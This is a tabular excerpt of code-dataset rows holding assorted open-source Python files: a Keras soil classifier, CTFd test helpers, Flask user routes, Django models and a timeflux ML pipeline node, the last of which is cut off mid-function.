| max_stars_repo_path (string, length 4–286) | max_stars_repo_name (string, length 5–119) | max_stars_count (int64, 0–191k) | id (string, length 1–7) | content (string, length 6–1.03M) | language (111 classes) | language_score (float64, 0.03–1) | comments (string, length 0–556k) | edu_score (float64, 0.32–5.03) | edu_int_score (int64, 0–5) |
|---|---|---|---|---|---|---|---|---|---|
Image classifier/train.py | anirudha-bs/Farm_assist | 0 | 10300 | from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
from keras import regularizers
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, Dropout, MaxPooling2D
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from keras.models import load_model
import numpy as np
from keras.preprocessing.image import img_to_array, load_img
from keras.preprocessing import image
import os
import matplotlib.pyplot as plt
# defining classes
def soil(result):
soil_type=""
if result[0]==2:
soil_type="Red soil"
elif result[0]==1:
soil_type="Black soil"
else:
soil_type="Alluvial soil"
return soil_type
# Adding dataset paths
PATH = 'new_datasets'
train_dir = os.path.join(PATH, 'train')
validation_dir = os.path.join(PATH, 'validation')
test_dir = os.path.join(PATH, 'test')
train_red_dir = os.path.join(train_dir, 'Red_soil')
validation_red_dir = os.path.join(validation_dir, 'Red_soil')
train_black_dir = os.path.join(train_dir, 'Black_soil')
validation_black_dir = os.path.join(validation_dir, 'Black_soil')
train_all_dir = os.path.join(train_dir, 'Alluvial_soil')
validation_all_dir = os.path.join(validation_dir, 'Alluvial_soil')
num_soil_tr = len(os.listdir(train_red_dir)) + len(os.listdir(train_black_dir)) +len(os.listdir(train_all_dir))
num_soil_val = len(os.listdir(validation_red_dir)) + len(os.listdir(validation_black_dir)) + len((os.listdir(validation_all_dir)))
print("Total training images = ",num_soil_tr)
print("Total validation images = ",num_soil_val)
# hyperparameters
batch_size = 100
epochs = 15
IMG_HEIGHT = 128
IMG_WIDTH = 128
classes_num=3
# data generators
train_image_generator = ImageDataGenerator(rescale=1./255)
validation_image_generator = ImageDataGenerator(rescale=1./255)
train_data_gen = train_image_generator.flow_from_directory(batch_size=batch_size,
directory=train_dir,
shuffle=True,
target_size=(IMG_HEIGHT, IMG_WIDTH),
class_mode='categorical')
val_data_gen = validation_image_generator.flow_from_directory(batch_size=batch_size,
directory=validation_dir,
target_size=(IMG_HEIGHT, IMG_WIDTH),
shuffle=True,
class_mode='categorical')
# defining the model
model = Sequential([
Conv2D(16, 5, activation='relu', input_shape=(IMG_HEIGHT, IMG_WIDTH ,3)),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(32, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(64, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.3),
Flatten(),
Dense(32, activation='relu'),
Dense(classes_num, activation='softmax')
])
model.compile(optimizer='adam',
              loss='categorical_crossentropy',  # matches the 3-class softmax output and categorical labels
metrics=['accuracy'])
model.summary()
history = model.fit_generator(
train_data_gen,
steps_per_epoch= num_soil_tr// batch_size,
epochs=epochs,
validation_data=val_data_gen,
validation_steps=num_soil_val // batch_size
)
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs_range = range(epochs)
# training and validation graphs
plt.figure(figsize=(8, 8))
plt.subplot(1, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(1, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.show()
model.save('new_soil_classify.h5')
# for testing trained model with images of different classes
image_path="red.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = image.img_to_array(img) / 255.0  # apply the same 1/255 rescaling used in training
img = np.expand_dims(img, axis=0)
result = model.predict_classes(img)
plt.title(soil(result))
plt.show()
image_path1="black.jpg"
img1 = image.load_img(image_path1, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img1)
img1 = image.img_to_array(img1) / 255.0  # rescale to match training
img1 = np.expand_dims(img1, axis=0)
result = model.predict_classes(img1)
plt.title(soil(result))
plt.show()
image_path="all.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = image.img_to_array(img) / 255.0  # rescale to match training
img = np.expand_dims(img, axis=0)
result = model.predict_classes(img)
plt.title(soil(result))
plt.show()
| en | 0.762645 | # defining classes # Adding dataset paths # hyperparameters # data generators # defining the model # training and validation graphs # for testing trained model with images of different classes | 2.535937 | 3 |
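The script above saves the model but never reloads it; a standalone inference pass would look roughly like the sketch below. It assumes the `new_soil_classify.h5` file produced above and a hypothetical `sample.jpg`; the label order follows `flow_from_directory`'s alphabetical folder ordering (Alluvial=0, Black=1, Red=2), which is also what the `soil()` helper encodes.

```python
# Standalone inference sketch; 'sample.jpg' is a hypothetical input file.
import numpy as np
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image

model = load_model('new_soil_classify.h5')
img = image.load_img('sample.jpg', target_size=(128, 128))
x = np.expand_dims(image.img_to_array(img) / 255.0, axis=0)  # rescale + batch dim
probs = model.predict(x)[0]                                  # softmax over 3 classes
labels = ["Alluvial soil", "Black soil", "Red soil"]         # alphabetical folder order
print(labels[int(np.argmax(probs))], float(probs.max()))
```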
questions/q118_linked_list_loop_removal/code.py | aadhityasw/Competitive-Programs | 0 | 10301 | def removeLoop(head):
ptr = head
ptr2 = head
while True :
if ptr is None or ptr2 is None or ptr2.next is None :
return
ptr = ptr.next
ptr2 = ptr2.next.next
if ptr is ptr2 :
loopNode = ptr
break
ptr = loopNode.next
count = 1
while ptr is not loopNode :
ptr = ptr.next
count += 1
ptr = head
ptr1 = head
ptr2 = head.next
while count > 1 :
ptr2 = ptr2.next
ptr1 = ptr1.next
count -= 1
while ptr is not ptr2 :
ptr = ptr.next
ptr2 = ptr2.next
ptr1 = ptr1.next
ptr1.next = None
| none | 1 | 3.824605 | 4 |
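The snippet ships without a driver, so here is a minimal sketch of how `removeLoop` could be exercised; the `Node` class is an assumption about the judge's node type (any object with a `next` attribute works).

```python
# Minimal driver sketch for removeLoop; the Node class is hypothetical.
class Node:
    def __init__(self, data):
        self.data = data
        self.next = None

# Build 1 -> 2 -> 3 -> 4 and close a loop back to node 2.
nodes = [Node(i) for i in range(1, 5)]
for a, b in zip(nodes, nodes[1:]):
    a.next = b
nodes[-1].next = nodes[1]        # create the loop

removeLoop(nodes[0])             # detect and break the loop in place
assert nodes[-1].next is None    # the list is linear again
```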
fastrunner/httprunner3/report/html/gen_report.py | Chankee/AutoTestRunner | 1 | 10302 | <gh_stars>1-10
import io
import os
from datetime import datetime
from jinja2 import Template
from loguru import logger
from httprunner.exceptions import SummaryEmpty
def gen_html_report(summary, report_template=None, report_dir=None, report_file=None):
""" render html report with specified report name and template
Args:
summary (dict): test result summary data
report_template (str): specify html report template path, template should be in Jinja2 format.
report_dir (str): specify html report save directory
report_file (str): specify html report file path, this has higher priority than specifying report dir.
"""
if not summary["time"] or summary["stat"]["testcases"]["total"] == 0:
logger.error(f"test result summary is empty ! {summary}")
raise SummaryEmpty
if not report_template:
report_template = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
"template.html"
)
logger.debug("No html report template specified, use default.")
else:
logger.info(f"render with html report template: {report_template}")
logger.info("Start to render Html report ...")
start_at_timestamp = summary["time"]["start_at"]
utc_time_iso_8601_str = datetime.utcfromtimestamp(start_at_timestamp).isoformat()
summary["time"]["start_datetime"] = utc_time_iso_8601_str
if report_file:
report_dir = os.path.dirname(report_file)
report_file_name = os.path.basename(report_file)
else:
report_dir = report_dir or os.path.join(os.getcwd(), "reports")
# fix #826: Windows does not support file name include ":"
report_file_name = "{}.html".format(utc_time_iso_8601_str.replace(":", "").replace("-", ""))
if not os.path.isdir(report_dir):
os.makedirs(report_dir)
report_path = os.path.join(report_dir, report_file_name)
with io.open(report_template, "r", encoding='utf-8') as fp_r:
template_content = fp_r.read()
with io.open(report_path, 'w', encoding='utf-8') as fp_w:
rendered_content = Template(
template_content,
extensions=["jinja2.ext.loopcontrols"]
).render(summary)
fp_w.write(rendered_content)
logger.info(f"Generated Html report: {report_path}")
return report_path
| en | 0.515722 | render html report with specified report name and template Args: summary (dict): test result summary data report_template (str): specify html report template path, template should be in Jinja2 format. report_dir (str): specify html report save directory report_file (str): specify html report file path, this has higher priority than specifying report dir. # fix #826: Windows does not support file name include ":" | 2.766206 | 3 |
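A minimal call sketch for `gen_html_report`; the `summary` dict below only guesses at the fields the function itself reads (`time.start_at` and `stat.testcases.total`), not HttpRunner's full summary schema.

```python
# Usage sketch; field values are illustrative, not a real test run.
summary = {
    "time": {"start_at": 1609459200.0},   # used for the report file name
    "stat": {"testcases": {"total": 1}},  # must be non-zero or SummaryEmpty is raised
}
path = gen_html_report(summary, report_dir="reports")
print(path)  # e.g. reports/20210101T000000.html
```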
SD/lab1/client.py | matheuscr30/UFU | 0 | 10303 | #client.py
#!/usr/bin/python # This is client.py file
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 12352 # Reserve a port for your service.
s.connect((host, port))
while True:
    message = input('Enter message: ')
    s.send(bytes(message, encoding='utf8'))
    if message == 'SAIR':  # 'SAIR' ("exit") is the agreed stop word
        break
    print('Message sent.')
    print('Waiting for response.')
    answer = s.recv(1024).decode('utf8')
    print('Response received: ' + answer)
print('Disconnecting.')
s.close()
| en | 0.573668 | #client.py #!/usr/bin/python # This is client.py file # Import socket module # Create a socket object # Get local machine name # Reserve a port for your service. | 3.410321 | 3 |
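The matching server is not part of this file; a minimal echo-style counterpart might look like the sketch below, assuming the same port and the `SAIR` stop word.

```python
# server.py - hypothetical counterpart for the client above.
import socket

srv = socket.socket()
srv.bind((socket.gethostname(), 12352))  # same host/port the client uses
srv.listen(1)
conn, addr = srv.accept()
while True:
    data = conn.recv(1024).decode('utf8')
    if not data or data == 'SAIR':       # client's exit sentinel
        break
    conn.send(bytes('echo: ' + data, encoding='utf8'))
conn.close()
srv.close()
```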
tests/helpers.py | ws4/TopCTFd | 1 | 10304 | <reponame>ws4/TopCTFd
from CTFd import create_app
from CTFd.models import *
from sqlalchemy_utils import database_exists, create_database, drop_database
from sqlalchemy.engine.url import make_url
import datetime
import json  # used by get_scores below
import six
if six.PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
def create_ctfd(ctf_name="CTFd", name="admin", email="<EMAIL>", password="password", setup=True):
app = create_app('CTFd.config.TestingConfig')
if setup:
with app.app_context():
with app.test_client() as client:
data = {}
r = client.get('/setup') # Populate session with nonce
with client.session_transaction() as sess:
data = {
"ctf_name": ctf_name,
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/setup', data=data)
return app
def destroy_ctfd(app):
drop_database(app.config['SQLALCHEMY_DATABASE_URI'])
def register_user(app, name="user", email="<EMAIL>", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/register')
with client.session_transaction() as sess:
data = {
"name": name,
"email": email,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/register', data=data)
def login_as_user(app, name="user", password="password"):
with app.app_context():
with app.test_client() as client:
r = client.get('/login')
with client.session_transaction() as sess:
data = {
"name": name,
"password": password,
"nonce": sess.get('nonce')
}
client.post('/login', data=data)
return client
def get_scores(user):
scores = user.get('/scores')
scores = json.loads(scores.get_data(as_text=True))
return scores['standings']
def gen_challenge(db, name='chal_name', description='chal_description', value=100, category='chal_category', type=0):
chal = Challenges(name, description, value, category)
db.session.add(chal)
db.session.commit()
return chal
def gen_award(db, teamid, name="award_name", value=100):
award = Awards(teamid, name, value)
db.session.add(award)
db.session.commit()
return award
def gen_tag(db, chal, tag='tag_tag'):
tag = Tags(chal, tag)
db.session.add(tag)
db.session.commit()
return tag
def gen_file():
pass
def gen_flag(db, chal, flag='flag', key_type=0):
key = Keys(chal, flag, key_type)
db.session.add(key)
db.session.commit()
return key
def gen_team(db, name='name', email='<EMAIL>', password='password'):
team = Teams(name, email, password)
db.session.add(team)
db.session.commit()
return team
def gen_hint(db, chal, hint="This is a hint", cost=0, type=0):
hint = Hints(chal, hint, cost, type)
db.session.add(hint)
db.session.commit()
return hint
def gen_solve(db, teamid, chalid, ip='127.0.0.1', flag='rightkey'):
solve = Solves(teamid, chalid, ip, flag)
solve.date = datetime.datetime.utcnow()
db.session.add(solve)
db.session.commit()
return solve
def gen_wrongkey(db, teamid, chalid, ip='127.0.0.1', flag='wrongkey'):
wrongkey = WrongKeys(teamid, chalid, ip, flag)
wrongkey.date = datetime.datetime.utcnow()
db.session.add(wrongkey)
db.session.commit()
return wrongkey
def gen_tracking(db, ip, team):
tracking = Tracking(ip, team)
db.session.add(tracking)
db.session.commit()
return tracking
def gen_page(db, route, html):
page = Pages(route, html)
db.session.add(page)
db.session.commit()
return page
| en | 0.799536 | # Populate session with nonce | 2.569187 | 3 |
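A sketch of how these helpers compose in a typical CTFd test; the test name, credentials, and the `/challenges` route are assumptions for illustration.

```python
# Hypothetical test using the helpers above.
def test_register_and_login():
    app = create_ctfd()
    register_user(app, name="user1", email="user1@example.com")
    client = login_as_user(app, name="user1")
    r = client.get('/challenges')
    assert r.status_code == 200
    destroy_ctfd(app)
```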
homeassistant/components/kaiterra/const.py | MrDelik/core | 30,023 | 10305 | """Consts for Kaiterra integration."""
from datetime import timedelta
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
Platform,
)
DOMAIN = "kaiterra"
DISPATCHER_KAITERRA = "kaiterra_update"
AQI_SCALE = {
"cn": [0, 50, 100, 150, 200, 300, 400, 500],
"in": [0, 50, 100, 200, 300, 400, 500],
"us": [0, 50, 100, 150, 200, 300, 500],
}
AQI_LEVEL = {
"cn": [
"Good",
"Satisfactory",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
"in": [
"Good",
"Satisfactory",
"Moderately polluted",
"Poor",
"Very poor",
"Severe",
],
"us": [
"Good",
"Moderate",
"Unhealthy for sensitive groups",
"Unhealthy",
"Very unhealthy",
"Hazardous",
],
}
ATTR_VOC = "volatile_organic_compounds"
ATTR_AQI_LEVEL = "air_quality_index_level"
ATTR_AQI_POLLUTANT = "air_quality_index_pollutant"
AVAILABLE_AQI_STANDARDS = ["us", "cn", "in"]
AVAILABLE_UNITS = [
"x",
PERCENTAGE,
"C",
"F",
CONCENTRATION_MILLIGRAMS_PER_CUBIC_METER,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
CONCENTRATION_PARTS_PER_BILLION,
]
AVAILABLE_DEVICE_TYPES = ["laseregg", "sensedge"]
CONF_AQI_STANDARD = "aqi_standard"
CONF_PREFERRED_UNITS = "preferred_units"
DEFAULT_AQI_STANDARD = "us"
DEFAULT_PREFERRED_UNIT: list[str] = []
DEFAULT_SCAN_INTERVAL = timedelta(seconds=30)
PLATFORMS = [Platform.SENSOR, Platform.AIR_QUALITY]
| en | 0.595333 | Consts for Kaiterra integration. | 1.72613 | 2 |
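The integration's own lookup code is not in this file, but the paired `AQI_SCALE` breakpoints and `AQI_LEVEL` labels suggest a bracket lookup like the sketch below (an illustration, not Home Assistant code).

```python
# Sketch: map a raw AQI value onto its level label via the scale breakpoints.
from bisect import bisect_right

def aqi_to_level(aqi: float, standard: str = DEFAULT_AQI_STANDARD) -> str:
    scale = AQI_SCALE[standard]             # e.g. [0, 50, 100, 150, 200, 300, 500]
    levels = AQI_LEVEL[standard]
    i = bisect_right(scale, aqi) - 1        # index of the bracket containing aqi
    return levels[min(i, len(levels) - 1)]  # clamp values beyond the top bracket

print(aqi_to_level(42))    # "Good"
print(aqi_to_level(120))   # "Unhealthy for sensitive groups"
```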
support/views.py | bhagirath1312/ich_bau | 1 | 10306 | <filename>support/views.py
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from .models import SupportProject
# Create your views here.
def index( request ):
sp = SupportProject.objects.all()
if sp.count() == 1:
return HttpResponseRedirect( sp.first().project.get_absolute_url() )
else:
context_dict = { 'sps' : sp, }
return render( request, 'support/index.html', context_dict )
| en | 0.968116 | # Create your views here. | 1.819845 | 2 |
timeline/models.py | KolibriSolutions/BepMarketplace | 1 | 10307 | <gh_stars>1-10
# Bep Marketplace ELE
# Copyright (c) 2016-2021 Kolibri Solutions
# License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE
#
from datetime import datetime
from django.core.exceptions import ValidationError
from django.db import models
class TimeSlot(models.Model):
"""
A timeslot is a year in which the current BEP runs. It consists of multiple timephases.
"""
Name = models.CharField(max_length=250)
Begin = models.DateField()
End = models.DateField()
def __str__(self):
return self.Name
def clean(self):
if not self.Begin or not self.End:
raise ValidationError('Please fill in all required fields.')
if self.Begin > self.End:
raise ValidationError("End date should be larger than begin date")
class Meta:
ordering = ["Begin"]
def is_finished(self):
return self.End < datetime.now().date()
class TimePhase(models.Model):
"""
A time phase is a phase the system is in. Each phase has its own pages and permissions.
"""
Types = (
(1, "Generating project proposals"),
(2, "Projects quality check"),
(3, "Students choosing projects"),
(4, "Distribution of projects"),
(5, "Gather and process objections"),
(6, "Execution of the projects"),
(7, "Presentation of results"),
)
Description = models.IntegerField(choices=Types)
Begin = models.DateField()
End = models.DateField()
CountdownEnd = models.DateField(null=True, blank=True,
help_text='Fake end date, to set the homepage clock to an earlier date. '
'A trick to motivate people.')
TimeSlot = models.ForeignKey(TimeSlot, on_delete=models.PROTECT, related_name="timephases")
def __str__(self):
return self.Types[self.Description - 1][1] + " in " + str(self.TimeSlot)
def clean(self):
if not self.Begin or not self.End or not hasattr(self, 'TimeSlot'):
raise ValidationError('Please fill in all required fields.')
if self.Begin > self.End:
raise ValidationError("End date should be larger than begin date")
if not (self.TimeSlot.Begin <= self.Begin <= self.TimeSlot.End):
raise ValidationError("Begin date should be in time slot {}".format(self.TimeSlot))
if not (self.TimeSlot.Begin <= self.End <= self.TimeSlot.End):
raise ValidationError("End date should be in time slot {}".format(self.TimeSlot))
if self.TimeSlot.timephases.filter(Description=self.Description).exists():
if self.TimeSlot.timephases.get(Description=self.Description) != self:
raise ValidationError("Time slot {} already has time phase {}".format(self.TimeSlot, self.Description))
class Meta:
ordering = ['TimeSlot', 'Begin']
| en | 0.894238 | # Bep Marketplace ELE # Copyright (c) 2016-2021 Kolibri Solutions # License: See LICENSE file or https://github.com/KolibriSolutions/BepMarketplace/blob/master/LICENSE # A timeslot is a year in which the current BEP runs. It consists of multiple timephases. A time phase is a phase the system is in. Each phase has its own pages and permissions. | 2.632571 | 3 |
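A sketch of the validation behaviour of `TimeSlot.clean()`; it assumes a configured Django settings module, and the dates are arbitrary examples.

```python
# Hypothetical check of TimeSlot.clean(); requires Django to be configured.
from datetime import date

slot = TimeSlot(Name="2021-2022", Begin=date(2021, 9, 1), End=date(2021, 8, 1))
try:
    slot.clean()                  # End before Begin -> rejected
except ValidationError as exc:
    print(exc)                    # "End date should be larger than begin date"

slot.End = date(2022, 7, 1)
slot.clean()                      # passes now
print(slot.is_finished())         # True once today's date is past slot.End
```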
app/api/user_routes.py | nappernick/envelope | 2 | 10308 | from datetime import datetime
from werkzeug.security import generate_password_hash
from flask import Blueprint, jsonify, request
from sqlalchemy.orm import joinedload
from flask_login import login_required
from app.models import db, User, Type
from app.forms import UpdateUserForm
from .auth_routes import authenticate, validation_errors_to_error_messages
user_routes = Blueprint('users', __name__)
@user_routes.route("/types")
def types():
types = db.session.query(Type).all()
return jsonify([type.name_to_id() for type in types])
@user_routes.route('/')
@login_required
def users():
users = db.session.query(User).all()
return jsonify([user.to_dict_full() for user in users])
@user_routes.route('/<int:id>')
@login_required
def user(id):
user = User.query.get(id)
return user.to_dict()
@user_routes.route('/<int:id>', methods=["DELETE"])
@login_required
def user_delete(id):
user = User.query.get(id)
db.session.delete(user)
db.session.commit()
return { id: "Successfully deleted" }
@user_routes.route('/<int:id>', methods=["POST"])
@login_required
def user_update(id):
user = User.query.options(joinedload("type")).get(id)
form = UpdateUserForm()
form['csrf_token'].data = request.cookies['csrf_token']
if form.validate_on_submit():
print("_______ FORM DATA",form.data)
        user.username = form.data['username']
        user.email = form.data['email']
        user.hashed_password = generate_password_hash(form.password.data)
        user.first_name = form.data['first_name']
        user.last_name = form.data['last_name']
        user.type_id = form.data['type_id']
user.updated_at=datetime.now()
db.session.commit()
return user.to_dict_full()
return {'errors': validation_errors_to_error_messages(form.errors)}
@user_routes.route("/<int:id>/clients")
@login_required
def admin_fetch_clients(id):
authenticated = authenticate()
clientUsers = db.session.query(User).filter_by(type_id=2).all()
if authenticated["type_id"] != 1:
return jsonify({
"errors": [
"Unauthorized"
]
})
return jsonify([user.to_dict_full() for user in clientUsers])
| none | 1 | 2.421405 | 2 |
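A quick sketch of exercising the unauthenticated `/types` route with Flask's test client; the blueprint's URL prefix (`/api/users` here) is an assumption about how the surrounding app registers it.

```python
# Hypothetical smoke test; `app` is the project's Flask application.
client = app.test_client()
r = client.get('/api/users/types')
print(r.get_json())  # one entry per Type row, shaped by Type.name_to_id()
```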
timeflux/nodes/ml.py | OpenMindInnovation/timeflux | 0 | 10309 | """Machine Learning"""
import importlib
import numpy as np
import pandas as pd
import json
from jsonschema import validate
from sklearn.pipeline import make_pipeline
from timeflux.core.node import Node
from timeflux.core.exceptions import ValidationError, WorkerInterrupt
from timeflux.helpers.background import Task
from timeflux.helpers.port import make_event, match_events, get_meta
from timeflux.helpers.clock import now, min_time, max_time
# Statuses
IDLE = 0
ACCUMULATING = 1
FITTING = 2
READY = 3
class Pipeline(Node):
"""Fit, transform and predict.
Training on continuous data is always unsupervised.
Training on epoched data can either be supervised or unsupervised.
    If fit is `False`, input events are ignored, and initial training is not performed.
    Automatically set to False if mode is either 'fit_predict' or 'fit_transform'.
Automatically set to True if mode is either 'predict', 'predict_proba' or 'predict_log_proba'.
Attributes:
i (Port): Continuous data input, expects DataFrame.
i_* (Port): Epoched data input, expects DataFrame.
i_training (Port): Continuous training data input, expects DataFrame.
i_training_* (Port): Epoched training data input, expects DataFrame.
i_events (Port): Event input, expects DataFrame.
o (Port): Continuous data output, provides DataFrame.
o_* (Port): Epoched data output, provides DataFrame.
o_events (Port): Event output, provides DataFrame.
Args:
steps (dict): Pipeline steps and settings
fit (bool):
mode ('predict'|'predict_proba'|'predict_log_proba'|'transform'|'fit_predict'|'fit_transform'):
meta_label (str|tuple|None):
event_start_accumulation (str):
event_stop_accumulation (str):
event_start_training (str):
event_reset (str):
buffer_size (str):
passthrough (bool):
resample (bool):
resample_direction ('right'|'left'|'both'):
resample_rate (None|float):
model: Load a pickle model - NOT IMPLEMENTED
cv: Cross-validation - NOT IMPLEMENTED
"""
def __init__(
self,
steps,
fit=True,
mode="predict",
meta_label=("epoch", "context", "target"),
event_start_accumulation="accumulation_starts",
event_stop_accumulation="accumulation_stops",
event_start_training="training_starts",
event_reset=None,
buffer_size="5s",
passthrough=False,
resample=False,
resample_direction="right",
resample_rate=None,
model=None,
cv=None,
        use_task=True,
):
# TODO: validation
# TODO: model loading from file
# TODO: cross-validation
# TODO: provide more context for errors
self.fit = fit
self.mode = mode
self.meta_label = meta_label
self.event_start_accumulation = event_start_accumulation
self.event_stop_accumulation = event_stop_accumulation
self.event_start_training = event_start_training
self.event_reset = event_reset
self.passthrough = passthrough
self.resample = resample
self.resample_direction = resample_direction
self.resample_rate = resample_rate
self.use_task = use_task
self._buffer_size = pd.Timedelta(buffer_size)
self._make_pipeline(steps)
self._reset()
def update(self):
# Let's get ready
self._clear()
# Reset
if self.event_reset:
matches = match_events(self.i_events, self.event_reset)
if matches is not None:
self.logger.debug("Reset")
if self._task is not None:
if self._status == FITTING:
self._task.stop()
self._reset()
# Are we dealing with continuous data or epochs?
if self._dimensions is None:
port_name = "i_training" if self.fit else "i"
if getattr(self, port_name).ready():
self._dimensions = 2
elif len(list(self.iterate(port_name + "_*"))) > 0:
self._dimensions = 3
# Set the accumulation boundaries
if self._accumulation_start is None:
matches = match_events(self.i_events, self.event_start_accumulation)
if matches is not None:
self._accumulation_start = matches.index.values[0]
self._status = ACCUMULATING
self.logger.debug("Start accumulation")
if self._accumulation_stop is None:
matches = match_events(self.i_events, self.event_stop_accumulation)
if matches is not None:
self._accumulation_stop = matches.index.values[0]
self.logger.debug("Stop accumulation")
# Always buffer a few seconds, in case the start event is coming late
if self._status == IDLE:
start = (now() - self._buffer_size).to_datetime64()
stop = max_time()
self._accumulate(start, stop)
# Accumulate between boundaries
if self._status == ACCUMULATING:
start = self._accumulation_start
stop = self._accumulation_stop if self._accumulation_stop else max_time()
self._accumulate(start, stop)
# Should we start fitting the model?
if self._status < FITTING:
if match_events(self.i_events, self.event_start_training) is not None:
self._status = FITTING
self.logger.debug("Start training")
if self.use_task:
self._task = Task(
self._pipeline, "fit", self._X_train, self._y_train
).start()
else:
try:
self._pipeline = self._pipeline.fit(self._X_train, self._y_train)
self._fitted_success = True
except Exception as error:
self._fitted_success = False
# Is the model ready?
if self._status == FITTING:
ready_to_proceed = False
if self.use_task:
status = self._task.status()
if status:
ready_to_proceed = True
else:
ready_to_proceed = True
if ready_to_proceed:
if self.use_task:
success = status["success"]
else:
success = self._fitted_success
if success:
if self.use_task:
self._pipeline = status["instance"]
self.logger.debug(f"Model fitted in {status['time']} seconds")
else:
self.logger.debug(f"Model fitted")
self._status = READY
# TODO: this can potentially be overwritten in _send()
self.o_events.data = make_event("ready")
else:
if self.use_task:
                        self.logger.error(
                            f"An error occurred while fitting: {status['exception'].args[0]}"
                        )
self.logger.debug(
"\nTraceback (most recent call last):\n"
+ "".join(status["traceback"])
)
else:
                        self.logger.error(
                            "An error occurred while fitting"
                        )
raise WorkerInterrupt()
# Run the pipeline
if self._status == READY:
self._receive()
if self._X is not None:
args = [self._X]
if self.mode.startswith("fit"):
args.append(self._y)
# TODO: optionally loop through epochs instead of sending them all at once
self._out = getattr(self._pipeline, self.mode)(*args)
# Set output streams
self._send()
def terminate(self):
# Kill the fit subprocess
if self._task is not None:
self._task.stop()
def _reset(self):
self._X_train = None
self._y_train = None
self._X_train_indices = np.array([], dtype=np.datetime64)
self._accumulation_start = None
self._accumulation_stop = None
self._dimensions = None
self._shape = ()
self._task = None
if self.mode.startswith("fit"):
self.fit = False
elif self.mode.startswith("predict"):
self.fit = True
if self.fit:
self._status = IDLE
else:
self._status = READY
def _clear(self):
self._X = None
self._y = None
self._X_indices = []
self._X_columns = []
self._X_meta = None
self._out = None
def _make_pipeline(self, steps):
schema = {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"module": {"type": "string"},
"class": {"type": "string"},
"args": {"type": "object"},
},
"required": ["module", "class"],
},
}
try:
validate(instance=steps, schema=schema)
except Exception as error:
raise ValidationError("steps", error.message)
pipeline = []
for step in steps:
try:
args = step["args"] if "args" in step else {}
m = importlib.import_module(step["module"])
c = getattr(m, step["class"])
i = c(**args)
pipeline.append(i)
except ImportError as error:
raise ValidationError("steps", f"could not import '{step['module']}'")
except AttributeError as error:
raise ValidationError(
"steps", f"could not find class '{step['class']}'"
)
except TypeError as error:
raise ValidationError(
"steps",
f"could not instantiate class '{step['class']}' with the given params",
)
# TODO: memory and verbose args
self._pipeline = make_pipeline(*pipeline, memory=None, verbose=False)
def _accumulate(self, start, stop):
# Do nothing if no fitting required
if not self.fit:
return
# Set defaults
indices = np.array([], dtype=np.datetime64)
# Accumulate continuous data
if self._dimensions == 2:
if self.i_training.ready():
data = self.i_training.data
mask = (data.index >= start) & (data.index < stop)
data = data[mask]
if not data.empty:
if self._X_train is None:
self._X_train = data.values
self._shape = self._X_train.shape[1]
indices = data.index.values
else:
if data.shape[1] == self._shape:
self._X_train = np.vstack((self._X_train, data.values))
indices = data.index.values
else:
self.logger.warning("Invalid shape")
# Accumulate epoched data
if self._dimensions == 3:
for _, _, port in self.iterate("i_training_*"):
if port.ready():
index = port.data.index.values[0]
if index >= start and index < stop:
data = port.data.values
label = get_meta(port, self.meta_label)
if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X_train is None:
self._X_train = np.array([data])
self._shape = self._X_train.shape[1:]
else:
self._X_train = np.vstack((self._X_train, [data]))
indices = np.append(indices, index)
if label is not None:
if self._y_train is None:
self._y_train = np.array([label])
else:
self._y_train = np.append(self._y_train, [label])
# Store indices
if indices.size != 0:
self._X_train_indices = np.append(self._X_train_indices, indices)
# Trim
if self._X_train is not None:
mask = (self._X_train_indices >= start) & (self._X_train_indices < stop)
self._X_train = self._X_train[mask]
self._X_train_indices = self._X_train_indices[mask]
if self._y_train is not None:
self._y_train = self._y_train[mask]
def _receive(self):
# Continuous data
if self._dimensions == 2:
if self.i.ready():
if not self._X_columns:
self._X_columns = list(self.i.data.columns)
if self._shape and (self.i.data.shape[1] != self._shape):
self.logger.warning("Invalid shape")
else:
self._X = self.i.data.values
self._X_indices = self.i.data.index.values
self._X_meta = self.i.meta
# Epochs
if self._dimensions == 3:
for name, _, port in self.iterate("i_*"):
if port.ready() and "training" not in name and "events" not in name:
data = port.data.values
meta = port.meta
indices = port.data.index.values
label = get_meta(port, self.meta_label)
if not self._X_columns:
self._X_columns = list(port.data.columns)
